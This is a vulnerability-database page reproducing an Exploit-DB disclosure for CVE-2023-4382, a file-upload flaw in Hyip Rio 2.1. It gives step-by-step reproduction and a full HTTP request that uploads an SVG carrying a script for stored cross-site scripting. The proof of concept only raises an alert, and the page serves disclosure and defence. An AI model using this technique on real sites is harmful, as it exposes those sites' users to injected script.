Lucene search
K

Hyip Rio 2.1 - Arbitrary File Upload

🗓️ 04 Sep 2023 00:00:00Reported by CraCkErType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 511 Views

Hyip Rio 2.1 Arbitrary File Upload allows attacker to upload malicious files, leading to Stored XS

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Hyip Rio 2.1 Cross Site Scripting / File Upload Vulnerabilities
16 Aug 202300:00
zdt
Circl
CVE-2023-4382
17 Aug 202300:36
circl
CNNVD
tdevs Hyip Rio 跨站脚本漏洞
16 Aug 202300:00
cnnvd
CVE
CVE-2023-4382
16 Aug 202319:31
cve
Cvelist
CVE-2023-4382 tdevs Hyip Rio Profile Settings settings cross site scripting
16 Aug 202319:31
cvelist
EUVD
EUVD-2023-54246
3 Oct 202520:07
euvd
NVD
CVE-2023-4382
16 Aug 202320:15
nvd
Packet Storm
Hyip Rio 2.1 Cross Site Scripting / File Upload
16 Aug 202300:00
packetstorm
Prion
Cross site scripting
16 Aug 202320:15
prion
Positive Technologies
PT-2023-29001 · Unknown · Tdevs Hyip Rio
16 Aug 202300:00
ptsecurity
Rows per page
# Exploit Title: Hyip Rio 2.1 - Arbitrary File Upload
# Exploit Author: CraCkEr
# Date: 30/07/2023
# Vendor: tdevs
# Vendor Homepage: https://tdevs.co/
# Software Link: https://hyiprio-feature.tdevs.co/
# Version: 2.1
# Tested on: Windows 10 Pro
# Impact: Allows User to upload files to the web server
# CVE: CVE-2023-4382


## Description

Allows Attacker to upload malicious files onto the server, such as Stored XSS


## Steps to Reproduce:

1. Login as a [Normal User]
2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/user/settings
3. Upload any Image into the [avatar]
4. Capture the POST Request with [Burp Proxy Intercept]
5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS]

-----------------------------------------------------------
POST /user/settings/profile-update HTTP/2

Content-Disposition: form-data; name="avatar"; filename="XSS.svg"
Content-Type: image/png

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS by Skalvin");
</script>
</svg>
-----------------------------------------------------------

6. Send the Request
7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS] or right-click on the Avatar and Copy the Link
8. Access your Uploded Evil file on this Path: https://website/assets/global/images/********************.svg



[-] Done

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Sep 2023 00:00Current
5.6Medium risk
Vulners AI Score5.6
CVSS 3.13.5 - 5.4
CVSS 24
CVSS 33.5
EPSS0.00506
SSVC
511